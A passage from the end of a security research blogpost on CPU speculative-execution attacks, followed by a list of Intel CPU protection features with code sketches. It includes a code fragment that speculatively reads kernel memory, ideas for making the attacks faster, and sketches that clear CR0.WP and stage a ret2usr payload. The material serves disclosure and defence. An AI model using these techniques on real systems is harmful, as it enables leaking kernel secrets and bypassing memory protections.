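volatile int dependent_flag;              /* trained to 1, then flushed and set to 0 */

void try_read(const volatile uint8_t *kernel_addr) {
    _mm_clflush((void *)&dependent_flag);  /* make the branch condition slow to resolve */
    _mm_mfence();
    if (dependent_flag) {                  /* predicted taken because of earlier training */
        /* Architecturally this path is never taken, so no page fault is delivered;
           speculatively, the kernel byte is read and encoded into the cache. */
        uint8_t secret = *kernel_addr;
        (void)probe[(secret & 1) * 4096];
    }
    /* afterwards: time probe[0] and probe[4096] to recover the leaked bit */
}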

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 2^(31-8) or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statements were provided to us regarding this issue by the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 2^15 mappings would be more efficient, but the kernel places a hard cap of 2^16 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

Intel CPU security features

List of Intel CPU security features along with short descriptions taken from the Intel manuals.

WP (Write Protect) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP).
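
For illustration, kernel code occasionally toggles CR0.WP to write through otherwise read-only mappings. The sketch below is a minimal, hypothetical kernel-mode example (x86-64 inline assembly; modern Linux kernels pin CR0.WP, so treat it as illustrative only, not as a recommended technique):

    /* Sketch: temporarily clearing CR0.WP so supervisor-mode code can write
     * to a page whose PTE is read-only. Hypothetical x86-64 kernel-mode code. */
    static inline unsigned long read_cr0_raw(void)
    {
        unsigned long cr0;
        asm volatile("mov %%cr0, %0" : "=r"(cr0));
        return cr0;
    }

    static inline void write_cr0_raw(unsigned long cr0)
    {
        asm volatile("mov %0, %%cr0" : : "r"(cr0) : "memory");
    }

    static void patch_readonly(unsigned long *target, unsigned long value)
    {
        unsigned long cr0 = read_cr0_raw();

        write_cr0_raw(cr0 & ~(1UL << 16));  /* clear CR0.WP (bit 16)        */
        *target = value;                    /* write despite the R/O mapping */
        write_cr0_raw(cr0);                 /* restore CR0.WP               */
    }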

NXE/XD (No-Execute Enable/Execute Disable) (PDF)

Regarding IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3):

IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instruction fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed).

IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging.

Regarding XD (Volume 3A, 4-17, Table 4-11):

If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0).
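
A quick way to confirm whether NXE is in effect on a running Linux system is to read IA32_EFER (MSR 0xC0000080) and test bit 11. The sketch below uses the standard msr character device; it assumes the msr kernel module is loaded and root privileges, and is not part of the quoted manual text:

    /* Sketch: check IA32_EFER.NXE (bit 11) via /dev/cpu/0/msr.
     * Assumes the Linux "msr" module is loaded and the process runs as root. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        uint64_t efer;
        int fd = open("/dev/cpu/0/msr", O_RDONLY);
        if (fd < 0) {
            perror("open /dev/cpu/0/msr");
            return 1;
        }
        /* The MSR number is passed as the file offset. */
        if (pread(fd, &efer, sizeof(efer), 0xC0000080) != (ssize_t)sizeof(efer)) {
            perror("read IA32_EFER");
            return 1;
        }
        printf("IA32_EFER.NXE = %d\n", (int)((efer >> 11) & 1));
        close(fd);
        return 0;
    }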

SMAP (Supervisor Mode Access Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC.
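
When supervisor code legitimately needs to touch user memory under SMAP, it sets EFLAGS.AC around the access, typically with the STAC/CLAC instructions. A minimal, hypothetical kernel-mode sketch (real kernels hide this inside helpers such as copy_from_user()):

    /* Sketch: bracketing a deliberate user-memory access with STAC/CLAC so it
     * is permitted under SMAP. Hypothetical x86-64 kernel-mode code. */
    static unsigned long read_user_word(const unsigned long *user_ptr)
    {
        unsigned long value;

        asm volatile("stac" ::: "memory");   /* set EFLAGS.AC: allow the access */
        value = *user_ptr;                   /* supervisor-mode read of a user VA */
        asm volatile("clac" ::: "memory");   /* clear EFLAGS.AC: re-arm SMAP */
        return value;
    }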

SMEP (Supervisor Mode Execution Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches. If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.
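
The textbook attack SMEP blocks is «ret2usr»: userspace stages an executable payload at a user address and a kernel bug redirects execution to it. A rough sketch of the userspace staging half (purely illustrative; with CR4.SMEP = 1 the kernel faults instead of executing the page):

    /* Sketch: the userspace staging step of a classic ret2usr attack, which
     * SMEP defeats. The payload lives in a user-accessible executable page. */
    #include <stdio.h>
    #include <sys/mman.h>

    int main(void)
    {
        /* Executable user page that a hijacked kernel control flow would jump to. */
        void *payload = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (payload == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
        printf("payload page at %p (kernel execution of it is blocked by SMEP)\n",
               payload);
        return 0;
    }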

MPX (Memory Protection Extensions) (PDF)

Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow).
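
Conceptually, MPX automates in hardware what the plain-C sketch below does by hand: bounds are recorded alongside a pointer and checked before every access. (With MPX the compiler emits BNDMK to create the bounds and BNDCL/BNDCU to check them; the extension has since been deprecated, so this is an analogy rather than real MPX code.)

    /* Sketch: software analogy of what MPX bounds registers automate. */
    #include <stdio.h>
    #include <stdlib.h>

    struct bounded_ptr {
        int *ptr;
        int *lower;   /* lowest valid address  */
        int *upper;   /* highest valid address */
    };

    static int checked_read(struct bounded_ptr bp, size_t idx)
    {
        int *p = bp.ptr + idx;
        if (p < bp.lower || p > bp.upper) {   /* what BNDCL/BNDCU would check */
            fprintf(stderr, "bounds violation\n");
            abort();
        }
        return *p;
    }

    int main(void)
    {
        int buf[4] = {1, 2, 3, 4};
        struct bounded_ptr bp = { buf, buf, buf + 3 };  /* what BNDMK would record */

        printf("%d\n", checked_read(bp, 2));   /* in bounds        */
        printf("%d\n", checked_read(bp, 4));   /* aborts: overrun  */
        return 0;
    }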

SGX (Software Guard Extensions) (PDF)

These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application’s address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented.
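
With Intel's SGX SDK, the untrusted host application loads a signed enclave image and may only interact with it through explicitly declared ECALLs. A minimal host-side sketch, assuming the SDK is installed, an enclave.signed.so exists, and a hypothetical ECALL named ecall_seal_secret was declared in its EDL file:

    /* Sketch: untrusted host side of an SGX application using Intel's SGX SDK.
     * enclave.signed.so and the ECALL ecall_seal_secret are assumptions. */
    #include <stdio.h>
    #include <sgx_urts.h>
    #include "enclave_u.h"   /* generated from the enclave's EDL file (assumption) */

    int main(void)
    {
        sgx_enclave_id_t eid;
        sgx_launch_token_t token = {0};
        int updated = 0;

        sgx_status_t ret = sgx_create_enclave("enclave.signed.so", SGX_DEBUG_FLAG,
                                              &token, &updated, &eid, NULL);
        if (ret != SGX_SUCCESS) {
            fprintf(stderr, "sgx_create_enclave failed: 0x%x\n", ret);
            return 1;
        }

        /* Enclave code and data are inaccessible to the host; only this
         * explicit ECALL interface crosses the boundary. */
        ecall_seal_secret(eid);

        sgx_destroy_enclave(eid);
        return 0;
    }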

Protection keys (PDF)

Quoting Volume 3A, 4-31, Paragraph 4.6.2:

The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written.

The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys:

One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large.

There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack.

Another commonly mentioned use case is to protect regions of data from being corrupted by «stray» write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption. He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow.
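
On Linux, the feature is exposed through pkey_alloc(), pkey_mprotect() and a userspace PKRU update (pkey_set() in glibc). The sketch below shows the «hide the key material» pattern described above; it assumes a CPU and kernel with pkeys support and glibc 2.27 or newer:

    /* Sketch: protecting a buffer with a memory protection key, then toggling
     * access with a single PKRU update instead of mprotect() on every page. */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>

    int main(void)
    {
        char *secret = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        int pkey = pkey_alloc(0, 0);
        if (secret == MAP_FAILED || pkey < 0 ||
            pkey_mprotect(secret, 4096, PROT_READ | PROT_WRITE, pkey) != 0) {
            perror("pkey setup");
            return 1;
        }

        strcpy(secret, "key material");        /* access currently allowed        */

        pkey_set(pkey, PKEY_DISABLE_ACCESS);   /* one register write: locked      */
        /* Any read or write of `secret` here would raise SIGSEGV. */

        pkey_set(pkey, 0);                     /* one register write: unlocked    */
        printf("%s\n", secret);

        pkey_free(pkey);
        return 0;
    }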

CET (Control-flow Enforcement Technology) (PDF)

Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP style control-flow subversion attacks:

  • Shadow Stack – return address protection to defend against Return Oriented Programming,
  • Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming.
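
In practice CET is compiler-assisted: building with -fcf-protection makes the toolchain emit ENDBR64 landing pads at valid indirect-branch targets and use the shadow stack for returns on CET-capable hardware (on older CPUs the new instructions behave as NOPs). A small example, assuming a GCC or Clang toolchain with -fcf-protection support:

    /* Sketch: code built with CET instrumentation, e.g.
     *     gcc -O2 -fcf-protection=full cet_demo.c -o cet_demo
     * Valid indirect-call targets get an ENDBR64 landing pad (indirect branch
     * tracking); return addresses are checked against the shadow stack. */
    #include <stdio.h>

    static void handler(void)
    {
        /* The compiler places ENDBR64 at this function's entry, so an
         * indirect call may legitimately land here. */
        puts("called indirectly");
    }

    int main(void)
    {
        void (*fp)(void) = handler;
        fp();   /* indirect call: must land on an ENDBR64-marked target */
        return 0;
    }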